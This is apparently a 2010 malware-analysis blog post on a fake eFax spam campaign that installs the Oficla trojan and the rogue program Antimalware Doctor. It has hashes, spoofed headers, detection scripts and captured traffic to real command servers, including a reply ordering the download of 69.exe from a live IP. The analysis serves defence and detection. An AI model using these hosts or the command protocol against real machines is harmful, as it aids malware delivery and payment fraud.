We received an interesting email this morning from a fake eFax sender, with a suspicious ZIP archive (.ZIP) attached and the subject line “You’ve got a fax”. The strange part is that the ZIP file contains an executable (.EXE) carrying the MS Word icon.
Report date: 2010-09-17 13:42:07 (GMT 1)
File name: efax-97901doc-exe
File size: 43008 bytes
MD5 hash: 5276e96227570b2bf6ec85a306db1027
SHA1 hash: 60fe4ecb7cb2b6e9c3173223c35b0fee3aa5149a
Detection rate: 6 on 16 (38%)
Status: INFECTED
The details of the message source of the received emails are as follows:
From: “eFax” efax(at)efax.com
Received: from efax.com (unknown [95.139.213.105])
Subject: You’ve got a fax
Date: Thu, 16 Sep 2010 15:36:03 +0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
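The headers above already give a defender something to check automatically: the first Received hop claims the HELO name efax.com, the same domain as the From address, but the connecting host has no reverse DNS (“unknown”). The following is an added example, not part of the original post, that parses a small constructed header block modelled on the fields quoted above and flags that mismatch; the header text, the `check_received` function and the clean comparison case are all constructed for this illustration.

```python
import re

# Constructed header block modelled on the fields quoted in the post (not a real capture).
SUSPECT_HEADERS = """\
From: "eFax" efax@efax.com
Received: from efax.com (unknown [95.139.213.105])
Subject: You've got a fax
Date: Thu, 16 Sep 2010 15:36:03 +0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
"""

# Constructed clean case for comparison: HELO name, reverse DNS and From domain all agree.
CLEAN_HEADERS = """\
From: "Alice" alice@example.net
Received: from mail.example.net (mail.example.net [192.0.2.10])
Subject: Meeting notes
"""

# Matches the common MTA form: "from <helo> (<reverse-dns> [<ip>])"
RECEIVED_RE = re.compile(
    r"^Received:\s+from\s+(?P<helo>\S+)\s+\((?P<rdns>[^\s\[]+)\s+\[(?P<ip>[^\]]+)\]\)",
    re.MULTILINE,
)


def parse_headers(raw):
    """Split a raw header block into a lower-cased name -> list of values map."""
    headers = {}
    for line in raw.splitlines():
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def sender_domain(from_value):
    """Return the domain of the first address in a From: value, or None."""
    m = re.search(r"[\w.+-]+@([\w.-]+)", from_value)
    return m.group(1).lower() if m else None


def check_received(raw):
    """Return a list of findings about the first Received hop (empty list = nothing odd)."""
    findings = []
    m = RECEIVED_RE.search(raw)
    if not m:
        return ["no parseable Received header"]
    helo, rdns, ip = m.group("helo").lower(), m.group("rdns").lower(), m.group("ip")

    headers = parse_headers(raw)
    from_domain = sender_domain(headers.get("from", [""])[0])

    if rdns == "unknown":
        findings.append(f"host {ip} has no reverse DNS but announced itself as '{helo}'")
    elif not (rdns == helo or rdns.endswith("." + helo)):
        findings.append(f"reverse DNS '{rdns}' of {ip} does not match HELO '{helo}'")

    # A HELO name equal to the From domain from an unverifiable host is a spoofing indicator.
    if from_domain and helo == from_domain and rdns == "unknown":
        findings.append(f"From domain '{from_domain}' is claimed by an unverifiable host {ip}")
    return findings


if __name__ == "__main__":
    for label, raw in (("suspect", SUSPECT_HEADERS), ("clean", CLEAN_HEADERS)):
        print(label, check_received(raw) or "no findings")
```

The check is deliberately narrow: it only reads the first hop, so it should be applied to the Received line added by your own border MTA, which is the one hop the receiver can trust.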
We have executed the file in our sandbox and this is the file activity:
The file that has been created in system directory is named hyli.igo and it is the main executable file of the Oficla trojan that is used to control the victim’s computer and to install the rogue security software Antimalware Doctor.
Network Traffic:
GET /group/mixer/bb.php?v=200&id=XXX&b=XXX&tm=0 HTTP/1.1
User-Agent: Opera\9.64
Host: moneymader .ru
Response:
[info]delay:15|upd:1|backurls:hxxp://91.204.48.46 /milk/69.exe[/info]
The malware connected to the C&C server of the Oficla trojan to receive new commands from the bot owner. From the response to the GET request we can see that the malware received the command to update itself (“upd:1”) with a new binary located at the URL given in “backurls:”.
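The beacon and its reply are simple enough to turn into detection and enrichment logic. The following is an added example, not code from the original post: it scans a few constructed proxy log lines for the Oficla check-in pattern seen above (a GET to bb.php with the v/id/b/tm parameters and the “Opera\9.64” user agent) and parses the pipe-delimited [info]...[/info] reply into fields so the update URL can be pulled out for blocking. The log format, the `SAMPLE_LOG` lines and the function names are assumptions for this illustration; the URLs are kept defanged (hxxp) as in the post.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log lines (not from the original post).
# Format assumed here: <client ip> <method> <url> "<user-agent>"
SAMPLE_LOG = """\
10.0.0.5 GET hxxp://moneymader.ru/group/mixer/bb.php?v=200&id=XXX&b=XXX&tm=0 "Opera\\9.64"
10.0.0.7 GET hxxp://www.example.com/index.html "Mozilla/5.0"
10.0.0.5 GET hxxp://91.204.48.46/milk/69.exe "Opera\\9.64"
"""

# C&C reply as quoted in the post, defanged.
C2_RESPONSE = "[info]delay:15|upd:1|backurls:hxxp://91.204.48.46/milk/69.exe[/info]"

LOG_LINE_RE = re.compile(r'(\S+) (\S+) (\S+) "([^"]*)"')
BEACON_PATH_RE = re.compile(r"/bb\.php$")
BEACON_PARAMS = {"v", "id", "b", "tm"}


def is_oficla_beacon(url, user_agent):
    """True when the request matches the check-in shape observed in the sandbox."""
    parts = urlsplit(url)
    if not BEACON_PATH_RE.search(parts.path):
        return False
    params = set(parse_qs(parts.query).keys())
    # Require the full parameter set and the hard-coded Opera-style user agent.
    return BEACON_PARAMS <= params and user_agent.startswith("Opera\\")


def scan_log(text):
    """Return (client, c2_host) pairs for every beacon found in the log text."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        client, method, url, user_agent = m.groups()
        if method == "GET" and is_oficla_beacon(url, user_agent):
            hits.append((client, urlsplit(url).hostname))
    return hits


def parse_c2_response(body):
    """Parse '[info]k:v|k:v[/info]' into a dict; None when the wrapper is absent."""
    m = re.search(r"\[info\](.*?)\[/info\]", body, re.DOTALL)
    if not m:
        return None
    command = {}
    for field in m.group(1).split("|"):
        key, sep, value = field.partition(":")  # split on the first ':' only, URLs contain ':'
        if sep:
            command[key.strip()] = value.strip()
    return command


def extract_update_urls(command):
    """Return the URLs the bot is told to fetch when an update is ordered (upd:1)."""
    if not command or command.get("upd") != "1":
        return []
    return [u for u in command.get("backurls", "").split(",") if u]


if __name__ == "__main__":
    print("beacons:", scan_log(SAMPLE_LOG))
    cmd = parse_c2_response(C2_RESPONSE)
    print("command:", cmd)
    print("update urls to block:", extract_update_urls(cmd))
```

Only the first log line matches: the third line is the follow-up download from the backurls host, which is caught by the C&C response parser rather than by the beacon signature, so both pieces of logic are needed to cover the full update cycle.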
At this point the Oficla trojan started to download the Antimalware Doctor installer. The image below shows that it looks like an installer for Microsoft Windows Updates, but it installs the rogue security software Antimalware Doctor instead:
Common symptoms of a rogue security software infection are the repeated false security alerts stating that the user’s system is infected by a large number of trojans; the user is then pushed to click the “Remove Threats” button, which opens the main program and runs a fake system scan:
This is the main GUI of Antimalware Doctor:
Task manager has also been disabled:
New Network Traffic:
GET /inst.php?do=2&a=XXX&b=en&c=XXX&d=10&e=Win5.1.2600SP2 HTTP/1.1
Host: s.statst .in

GET /load/load.php?a=XXX&b=en&c=XXX&e=Win5.1.2600SP2 HTTP/1.1
Host: statst .in

GET /setup710binfile.exe HTTP/1.1
Host: outgtrf .in

GET /install.php?do=1&coid=XXX&fff=XXX&IP=XXX&lct=ITA&v=X240 HTTP/1.1
Host: s.statst .in
Antimalware Doctor then started to display fake security alerts that redirect to the website used to purchase the rogue security software. Bear in mind that all the payment systems used by these rogues are fraudulent and in most cases can also steal the credit card details entered during the payment process:
GET /purchase.php?aaa=csp&fff=XXX&sbb=X240-1-aftscann&lct=ITA&ttt=1&tns=1&sss=2&nocashe=1 HTTP/1.1
Host: statst .in
SSL Connection used during payments:
83.133.115.9:443
Domain & IP Analysis:
moneymader .ru / 109.196.134.44
91.204.48.46
outgtrf .in / 89.187.53.250
s.statst.in / 85.234.191.21
statst.in / 85.234.191.21
83.133.115.9